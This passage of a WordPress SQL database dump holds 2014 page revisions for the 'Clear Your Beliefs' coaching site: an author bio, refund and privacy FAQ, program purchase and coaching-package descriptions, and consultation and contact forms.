href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-24 15:59:42', '2014-06-24 20:59:42', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1066, 2, '2014-06-25 11:37:38', '2014-06-25 16:37:38', 'Purchase the Clear Your Beliefs Program\r\n\r\nYou’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the course. You’ll also get a complete set of transcripts, plus additional bonuses. Listen to the recordings online, or download them to your computer or MP3 player, at your convenience. Each session takes you through a BeliefCloset journey where you delete one belief, and you can listen to it over and over to delete additional beliefs.', 'Purchase the Clear Your Beliefs Program', '7 recorded sessions, 2 bonus recordings, PDF transcripts, plus additional bonuses. ', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-06-25 11:37:38', '2014-06-25 16:37:38', '', 96, 'http://clearyourbeliefs.com/96-revision-v1', 0, 'revision', '', 0),
(1061, 4194, '2014-06-25 07:38:13', '2014-06-25 12:38:13', 'Purchase the Clear Your Beliefs Program\r\n\r\nYou’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the course. You’ll also get a complete set of transcripts, plus additional bonuses. Listen to the recordings online, or download them to your computer or MP3 player, at your convenience. Each session takes you through a BeliefCloset journey where you delete one belief, and you can listen to it over and over to delete additional beliefs.', 'Purchase the Clear Your Beliefs Program', 'You’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the\r\n\r\ncourse. You’ll also get a complete set of transcripts, plus additional bonuses. Listen \r\n\r\nto the recordings online, or download them to your computer or MP3 player, at \r\n\r\nyour convenience. Each session takes you through a BeliefCloset journey where you \r\n\r\ndelete one belief, and you can listen to it over and over to delete additional beliefs.', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-06-25 07:38:13', '2014-06-25 12:38:13', '', 96, 'http://clearyourbeliefs.com/96-revision-v1', 0, 'revision', '', 0),
(1062, 2, '2014-12-03 19:15:25', '2014-12-04 00:15:25', '<h1 style="text-align: center;">Free 15-minute Consultation\nwith a Clear Your Beliefs Coach</h1>\nWould you like to find out whether <em>Clear Your Beliefs</em> is right for you?\n\nRegister for a free 15-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\n\nIn addition, we''ll send you our free multimedia eBook, "<em><strong>Clear Your Beliefs</strong></em>," as a gift. It''s a beautiful introduction to the topic of beliefs, belief change, and the <em>Clear Your Beliefs program</em>.\n\nSchedule your free consultation now:  \n\n<iframe width="750" height="600" src="https://my.timedriver.com/P4T2P?sh=1" frameborder="0"></iframe>\n\nOne of our professional <em>Clear Your Beliefs Coaches</em> will contact you at the appointed time.\n\nMost people find this initial consultation so valuable that they want to go deeper immediately. After 15-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\n\nAfter your session, please write to us at <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>, and let us know about your experience.\n\n&nbsp;\n\n</div>\n</div>', 'Free 15-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-autosave-v1', '', '', '2014-12-03 19:15:25', '2014-12-04 00:15:25', '', 107, 'http://clearyourbeliefs.com/107-autosave-v1', 0, 'revision', '', 0),
(1075, 4194, '2014-06-25 12:45:10', '2014-06-25 17:45:10', '<strong>Would you like to find out whether Clear Your Beliefs is right for you?</strong>\r\n\r\nRegister for a free 20-minute consultation with one of our <em>Clear Your Beliefs Coaches</em>.  They''ll answer your questions and give you a taste of what''s possible.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," an introduction to beliefs and the BeliefCloset Process.\r\n\r\nFill out this form to schedule your 20-minute consultation.  One of our BeliefCloset Coaches will respond to you within 72 hours.', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-06-25 12:45:10', '2014-06-25 17:45:10', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1064, 2, '2014-06-25 11:27:36', '2014-06-25 16:27:36', '<strong>Would you like to find out whether Clear Your Beliefs is right for you?</strong>\r\n\r\nRegister for a free 20-minute consultation with one of our <em>Clear Your Beliefs Coaches</em>.  They''ll answer your questions and give you a taste of what''s possible.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," an introduction to beliefs and the BeliefCloset Process.\r\n\r\nFill out this form to schedule your 20-minute consultation.  One of our BeliefCloset Coaches will respond to you within 72 hours.\r\n<h6>[Form]</h6>\r\n<h6></h6>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-06-25 11:27:36', '2014-06-25 16:27:36', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1065, 2, '2014-06-25 14:45:09', '2014-06-25 19:45:09', 'Purchase the Clear Your Beliefs Program\n\nReceive the full package including 7 recorded sessions, 2 bonus recordings, a complete set of PDF transcripts, plus additional bonuses. Listen online, or download them, and go through the sessions at your convenience. Each session takes you through a BeliefCloset journey, and the deletion of one belief. Listen again to delete additional beliefs.', 'The Clear Your Beliefs Program', 'You''ll receive the complete C package, including 7 recorded sessions, 2 bonus recordings, a complete set of PDF transcripts, plus additional bonuses. Listen online or download the sessions, listening at your convenience. Each session takes you through a complete BeliefCloset journey, and the deletion of one belief. Listen again and again to delete additional beliefs.', 'inherit', 'closed', 'open', '', '96-autosave-v1', '', '', '2014-06-25 14:45:09', '2014-06-25 19:45:09', '', 96, 'http://clearyourbeliefs.com/96-autosave-v1', 0, 'revision', '', 0),
(1067, 2, '2014-06-25 11:42:56', '2014-06-25 16:42:56', 'Get 30 min of coaching per week or per class', 'Buy program + 3.5 hours of coaching (PCP 1)', 'In addition to the Clear Your Beliefs Program, get 30 minutes of professional coaching per week.', 'inherit', 'closed', 'open', '', '98-revision-v1', '', '', '2014-06-25 11:42:56', '2014-06-25 16:42:56', '', 98, 'http://clearyourbeliefs.com/98-revision-v1', 0, 'revision', '', 0),
(1073, 4194, '2014-06-25 11:56:07', '2014-06-25 16:56:07', '', 'Buy program + 3.5 hours of coaching (PCP 1)', 'In addition to the Clear Your Beliefs Program, get 30 minutes of professional coaching per week.', 'inherit', 'closed', 'open', '', '98-revision-v1', '', '', '2014-06-25 11:56:07', '2014-06-25 16:56:07', '', 98, 'http://clearyourbeliefs.com/98-revision-v1', 0, 'revision', '', 0),
(1068, 2, '2014-06-25 11:43:24', '2014-06-25 16:43:24', 'In addition to the Clear Your Beliefs Program, get 30 minutes of professional coaching per week.', 'Buy program + 3.5 hours of coaching (PCP 1)', 'In addition to the Clear Your Beliefs Program, get 30 minutes of professional coaching per week.', 'inherit', 'closed', 'open', '', '98-revision-v1', '', '', '2014-06-25 11:43:24', '2014-06-25 16:43:24', '', 98, 'http://clearyourbeliefs.com/98-revision-v1', 0, 'revision', '', 0),
(1069, 2, '2014-06-25 11:47:05', '2014-06-25 16:47:05', '', 'Free 20 min consultation (FC) + Beliefs eBook', '20 min consultation (FC) + Beliefs eBook', 'inherit', 'closed', 'open', '', '100-revision-v1', '', '', '2014-06-25 11:47:05', '2014-06-25 16:47:05', '', 100, 'http://clearyourbeliefs.com/100-revision-v1', 0, 'revision', '', 0),
(1070, 2, '2014-06-25 11:47:42', '2014-06-25 16:47:42', '', 'Free 20-minute consultation (FC)', '20 min consultation (FC) + Beliefs eBook', 'inherit', 'closed', 'open', '', '100-revision-v1', '', '', '2014-06-25 11:47:42', '2014-06-25 16:47:42', '', 100, 'http://clearyourbeliefs.com/100-revision-v1', 0, 'revision', '', 0),
(1071, 2, '2014-06-25 11:48:11', '2014-06-25 16:48:11', '', 'Free 20-minute consultation (FC)', 'Free 20-minute consultation (FC) + Beliefs eBook', 'inherit', 'closed', 'open', '', '100-revision-v1', '', '', '2014-06-25 11:48:11', '2014-06-25 16:48:11', '', 100, 'http://clearyourbeliefs.com/100-revision-v1', 0, 'revision', '', 0),
(1072, 4194, '2014-06-25 11:55:49', '2014-06-25 16:55:49', '', 'Buy program + 3.5 hours of coaching (PCP 1)', 'In addition to the Clear Your Beliefs Program, get 30 minutes of professional coaching per week.', 'inherit', 'closed', 'open', '', '98-autosave-v1', '', '', '2014-06-25 11:55:49', '2014-06-25 16:55:49', '', 98, 'http://clearyourbeliefs.com/98-autosave-v1', 0, 'revision', '', 0),
(1085, 2, '2014-06-25 14:25:20', '2014-06-25 19:25:20', 'Purchase the Clear Your Beliefs Program\r\n\r\nReceive the full package including 7 recorded sessions, 2 bonus recordings, a complete set of PDF transcripts, plus additional bonuses. Listen online, or download them, and go through the sessions at your convenience. Each session takes you through a BeliefCloset journey, and the deletion of one belief. Listen again to delete additional beliefs.', 'The Clear Your Beliefs Program', 'You''ll receive the full package, including 7 recorded sessions, 2 bonus recordings, a complete set of PDF transcripts, plus additional bonuses. Listen online or download the sessions, listening at your convenience. Each session takes you through a complete BeliefCloset journey, and the deletion of one belief. Listen again and again to delete additional beliefs.', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-06-25 14:25:20', '2014-06-25 19:25:20', '', 96, 'http://clearyourbeliefs.com/96-revision-v1', 0, 'revision', '', 0),
(1074, 4194, '2014-06-25 12:34:26', '2014-06-25 17:34:26', 'Purchase the Clear Your Beliefs Program\r\n\r\nYou’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the course. You’ll also get a complete set of transcripts, plus additional bonuses. Listen to the recordings online, or download them to your computer or MP3 player, at your convenience. Each session takes you through a BeliefCloset journey where you delete one belief, and you can listen to it over and over to delete additional beliefs.', 'Purchase the Clear Your Beliefs Program', 'You’ll receive all 7 recorded sessions, plus 2 bonus recordings that complement the\r\n\r\ncourse. You’ll also get a complete set of transcripts, plus additional bonuses. Listen \r\n\r\nto the recordings online, or download them to your computer or MP3 player, at \r\n\r\nyour convenience. Each session takes you through a BeliefCloset journey where you \r\n\r\ndelete one belief, and you can listen to it over and over to delete additional beliefs.', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-06-25 12:34:26', '2014-06-25 17:34:26', '', 96, 'http://clearyourbeliefs.com/96-revision-v1', 0, 'revision', '', 0),
(1076, 4194, '2014-06-25 12:59:46', '2014-06-25 17:59:46', '<strong>Would you like to find out whether Clear Your Beliefs is right for you?</strong>\r\n\r\nRegister for a free 20-minute consultation with one of our <em>Clear Your Beliefs Coaches</em>.  They''ll answer your questions and give you a taste of what''s possible.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," an introduction to beliefs and the BeliefCloset Process.\r\n\r\nFill out this form to schedule your 20-minute consultation.  One of our BeliefCloset Coaches will respond to you within 72 hours.\r\n\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" />\r\n\r\n<input name="inf_form_name" type="hidden" value="CYB Ebook Opt In" />\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-06-25 12:59:46', '2014-06-25 17:59:46', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1077, 4194, '2014-06-25 13:01:53', '2014-06-25 18:01:53', '<strong>Would you like to find out whether Clear Your Beliefs is right for you?</strong>\r\n\r\nRegister for a free 20-minute consultation with one of our <em>Clear Your Beliefs Coaches</em>.  They''ll answer your questions and give you a taste of what''s possible.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," an introduction to beliefs and the BeliefCloset Process.\r\n\r\nFill out this form to schedule your 20-minute consultation.  One of our BeliefCloset Coaches will respond to you within 72 hours.\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB Ebook Opt In" />\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-06-25 13:01:53', '2014-06-25 18:01:53', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(1081, 4194, '2014-06-25 13:38:51', '2014-06-25 18:38:51', '<h1>Contact us with any questions</h1>\r\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/9273610ad1b435283befa0d2b3134fad" method="POST"><input name="inf_form_xid" type="hidden" value="9273610ad1b435283befa0d2b3134fad" />\r\n\r\n<input name="inf_form_name" type="hidden" value="Contact Us Webform" />\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_ContactUsRequest">Describe the nature of your request. </label>\r\n\r\n<textarea id="inf_custom_ContactUsRequest" cols="24" name="inf_custom_ContactUsRequest" rows="5">&lt;/p&gt;\r\n&lt;p&gt;    </textarea>\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form>', 'Contact', '', 'inherit', 'closed', 'open', '', '120-revision-v1', '', '', '2014-06-25 13:38:51', '2014-06-25 18:38:51', '', 120, 'http://clearyourbeliefs.com/120-revision-v1', 0, 'revision', '', 0),
(1082, 4194, '2014-06-25 13:40:17', '2014-06-25 18:40:17', '<h1>Contact us with any questions</h1>\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/9273610ad1b435283befa0d2b3134fad" method="POST"><input name="inf_form_xid" type="hidden" value="9273610ad1b435283befa0d2b3134fad" /><input name="inf_form_name" type="hidden" value="Contact Us Webform" />\r\n\r\n<input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_ContactUsRequest">Describe the nature of your request. </label>\r\n\r\n<textarea id="inf_custom_ContactUsRequest" cols="24" name="inf_custom_ContactUsRequest" rows="5">&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;\r\n&lt;p&gt;    </textarea>\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div>', 'Contact', '', 'inherit', 'closed', 'open', '', '120-revision-v1', '', '', '2014-06-25 13:40:17', '2014-06-25 18:40:17', '', 120, 'http://clearyourbeliefs.com/120-revision-v1', 0, 'revision', '', 0),
(1084, 4194, '2014-06-25 13:42:34', '2014-06-25 18:42:34', '<h1>Contact us with any questions</h1>\r\n<div class="icon_box" style="width: 70%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/9273610ad1b435283befa0d2b3134fad" method="POST"><input name="inf_form_xid" type="hidden" value="9273610ad1b435283befa0d2b3134fad" /><input name="inf_form_name" type="hidden" value="Contact Us Webform" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_ContactUsRequest">Describe the nature of your request. </label>\r\n\r\n<textarea id="inf_custom_ContactUsRequest" cols="24" name="inf_custom_ContactUsRequest" rows="5">  </textarea>\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div>', 'Contact', '', 'inherit', 'closed', 'open', '', '120-revision-v1', '', '', '2014-06-25 13:42:34', '2014-06-25 18:42:34', '', 120, 'http://clearyourbeliefs.com/120-revision-v1', 0, 'revision', '', 0),
(1083, 4194, '2014-06-25 13:41:00', '2014-06-25 18:41:00', '<h1>Contact us with any questions</h1>\r\n<div class="icon_box" style="width: 70%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/9273610ad1b435283befa0d2b3134fad" method="POST"><input name="inf_form_xid" type="hidden" value="9273610ad1b435283befa0d2b3134fad" /><input name="inf_form_name" type="hidden" value="Contact Us Webform" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Phone1">Phone Number</label>\r\n\r\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_ContactUsRequest">Describe the nature of your request. </label>\r\n\r\n<textarea id="inf_custom_ContactUsRequest" cols="24" name="inf_custom_ContactUsRequest" rows="5">&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;\r\n&lt;p&gt;    </textarea>\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Submit" />\r\n\r\n</div>\r\n</form></div>', 'Contact', '', 'inherit', 'closed', 'open', '', '120-revision-v1', '', '', '2014-06-25 13:41:00', '2014-06-25 18:41:00', '', 120, 'http://clearyourbeliefs.com/120-revision-v1', 0, 'revision', '', 0),
(1086, 2, '2014-06-25 14:45:45', '2014-06-25 19:45:45', 'Purchase the Clear Your Beliefs Program\r\n\r\nReceive the full package including 7 recorded sessions, 2 bonus recordings, a complete set of PDF transcripts, plus additional bonuses. Listen online, or download them, and go through the sessions at your convenience. Each session takes you through a BeliefCloset journey, and the deletion of one belief. Listen again to delete additional beliefs.', 'The Clear Your Beliefs Program', 'You''ll receive the complete Clear Your Beliefs package, including 7 recorded sessions, 2 bonus recordings, a set of PDF transcripts, plus additional bonuses. Listen online or download the sessions and listen at your convenience. Each session takes you through a complete BeliefCloset journey, and the deletion of one belief. Listen again and again to delete additional beliefs.', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-06-25 14:45:45', '2014-06-25 19:45:45', '', 96, 'http://clearyourbeliefs.com/96-revision-v1', 0, 'revision', '', 0),
(1088, 2, '2014-06-25 16:26:01', '2014-06-25 21:26:01', '', 'Buy program + 3.5 hours of coaching (PCP 1)', 'In addition to everything listed above, you''ll receive 30 minutes of professional coaching by phone (or Skype) each week, from a Clear Your Beliefs Coach.  He or she will keep you on track, answer your questions, guide your work, and take you deeper into your subconscious mind than you can travel by yourself.   Value: $500.00.  ', 'inherit', 'closed', 'open', '', '98-autosave-v1', '', '', '2014-06-25 16:26:01', '2014-06-25 21:26:01', '', 98, 'http://clearyourbeliefs.com/98-autosave-v1', 0, 'revision', '', 0),
(1090, 2, '2014-06-25 16:26:17', '2014-06-25 21:26:17', '', 'Buy program + 3.5 hours of coaching (PCP 1)', 'In addition to everything listed above, you''ll receive 30 minutes of professional coaching by phone (or Skype) each week, from a Clear Your Beliefs Coach.  He or she will keep you on track, answer questions, guide your work, and take you deeper into your subconscious mind than you can travel by yourself.   Value: $600.00.  ', 'inherit', 'closed', 'open', '', '98-revision-v1', '', '', '2014-06-25 16:26:17', '2014-06-25 21:26:17', '', 98, 'http://clearyourbeliefs.com/98-revision-v1', 0, 'revision', '', 0),
(1089, 2, '2014-06-25 16:23:17', '2014-06-25 21:23:17', '', 'Buy program + 3.5 hours of coaching (PCP 1)', 'In addition to everything listed above in the Clear Your Beliefs Program, you''ll receive 30 minutes of professional coaching per week from one of our Clear Your Beliefs Coaches, located world-wide.  He or she will keep you on track, answer your questions, guide your work, and take you deeper into your subconscious mind than you can travel by yourself.   Value: $500.00.  ', 'inherit', 'closed', 'open', '', '98-revision-v1', '', '', '2014-06-25 16:23:17', '2014-06-25 21:23:17', '', 98, 'http://clearyourbeliefs.com/98-revision-v1', 0, 'revision', '', 0),
(1091, 2, '2014-06-25 16:29:26', '2014-06-25 21:29:26', 'Get 60 min of coaching per week or per class', 'CYB Program + 7 hours of coaching (PCP 2)', 'In addition to the complete Clear Your Beliefs Program, you''ll receive seven hours of professional coaching (by phone or Skype) from a Clear Your Beliefs Coach.  He or she will guide you for an hour each week, , guide your work, and take you deeper into your subconscious mind than you can travel by yourself.   Value: $850.00.  ', 'inherit', 'closed', 'open', '', '99-autosave-v1', '', '', '2014-06-25 16:29:26', '2014-06-25 21:29:26', '', 99, 'http://clearyourbeliefs.com/99-autosave-v1', 0, 'revision', '', 0),
(1092, 2, '2014-06-25 16:29:56', '2014-06-25 21:29:56', 'Get 60 min of coaching per week or per class', 'CYB Program + 7 hours of coaching (PCP 2)', 'In addition to the complete Clear Your Beliefs Program, you''ll receive seven hours of professional coaching (by phone or Skype) from a Clear Your Beliefs Coach.  He or she will guide you for an hour each week, taking you deep into your subconscious mind – deeper than you can go by yourself.   Value: $850.00.  ', 'inherit', 'closed', 'open', '', '99-revision-v1', '', '', '2014-06-25 16:29:56', '2014-06-25 21:29:56', '', 99, 'http://clearyourbeliefs.com/99-revision-v1', 0, 'revision', '', 0),
